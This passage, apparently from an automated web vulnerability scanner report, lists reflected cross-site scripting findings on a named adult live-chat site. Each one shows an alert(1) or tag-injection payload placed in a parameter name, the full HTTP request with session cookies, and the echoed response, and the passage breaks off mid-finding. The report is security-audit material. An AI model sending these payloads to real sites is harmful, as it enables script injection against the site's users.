Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:12 GMT
Connection: close
Content-Length: 73010
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/free-sex-video-for-ipod/?5370e"><a>3222e16e08d=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.513. http://imlive.com/live-sex-chats/free-sex-video-for-ipod/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/free-sex-video-for-ipod/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload daba9'-alert(1)-'82614b3e5e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/free-sex-video-for-ipod/?daba9'-alert(1)-'82614b3e5e9=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:19 GMT
Connection: close
Content-Length: 73157
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/ipodmain.aspx&he=imlive.com&ul=/live-sex-chats/free-sex-video-for-ipod/?daba9'-alert(1)-'82614b3e5e9=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

4.514. http://imlive.com/live-sex-chats/free-sex-video/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/free-sex-video/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e26eb"><a>443e0c98ab7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/free-sex-video/?e26eb"><a>443e0c98ab7=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:23 GMT
Connection: close
Content-Length: 52111
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/free-sex-video/?e26eb"><a>443e0c98ab7=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.515. http://imlive.com/live-sex-chats/free-sex-video/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/free-sex-video/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b11eb'-alert(1)-'f3d704a6f4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/free-sex-video/?b11eb'-alert(1)-'f3d704a6f4f=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:29 GMT
Connection: close
Content-Length: 52326
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/competitionspage.aspx&he=imlive.com&ul=/live-sex-chats/free-sex-video/?b11eb'-alert(1)-'f3d704a6f4f=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

4.516. http://imlive.com/live-sex-chats/gay-couple/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/gay-couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20260"><a>39ff4f914a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/gay-couple/?20260"><a>39ff4f914a4=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:20:49 GMT
Connection: close
Content-Length: 34182
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/gay-couple/?20260"><a>39ff4f914a4=1">
...[SNIP]...

4.517. http://imlive.com/live-sex-chats/gay-couple/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/gay-couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2072'-alert(1)-'fe8b9fbca10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/gay-couple/?d2072'-alert(1)-'fe8b9fbca10=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:20:59 GMT
Connection: close
Content-Length: 34366
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/gay-couple/?d2072'-alert(1)-'fe8b9fbca10=1&qs=cat=1^roomid=52^d2072'-alert(1)-'fe8b9fbca10=1&qs=cat=1^roomid=52^d2072'-alert(1)-'fe8b9fbca10=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

4.518. http://imlive.com/live-sex-chats/gay/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/gay/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b640"><a>ffa3e1dc7af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/gay/?3b640"><a>ffa3e1dc7af=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:00 GMT
Connection: close
Content-Length: 195797
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/gay/?3b640"><a>ffa3e1dc7af=1">
...[SNIP]...

4.519. http://imlive.com/live-sex-chats/gay/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/gay/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4cfa'-alert(1)-'0c9972c192e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/gay/?d4cfa'-alert(1)-'0c9972c192e=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:28 GMT
Connection: close
Content-Length: 195962
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/gay/?d4cfa'-alert(1)-'0c9972c192e=1&qs=cat=1^roomid=53^d4cfa'-alert(1)-'0c9972c192e=1&qs=cat=1^roomid=53^d4cfa'-alert(1)-'0c9972c192e=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

4.520. http://imlive.com/live-sex-chats/guy-alone/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/guy-alone/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b427'-alert(1)-'a0cb4a3aa6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/guy-alone/?5b427'-alert(1)-'a0cb4a3aa6b=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
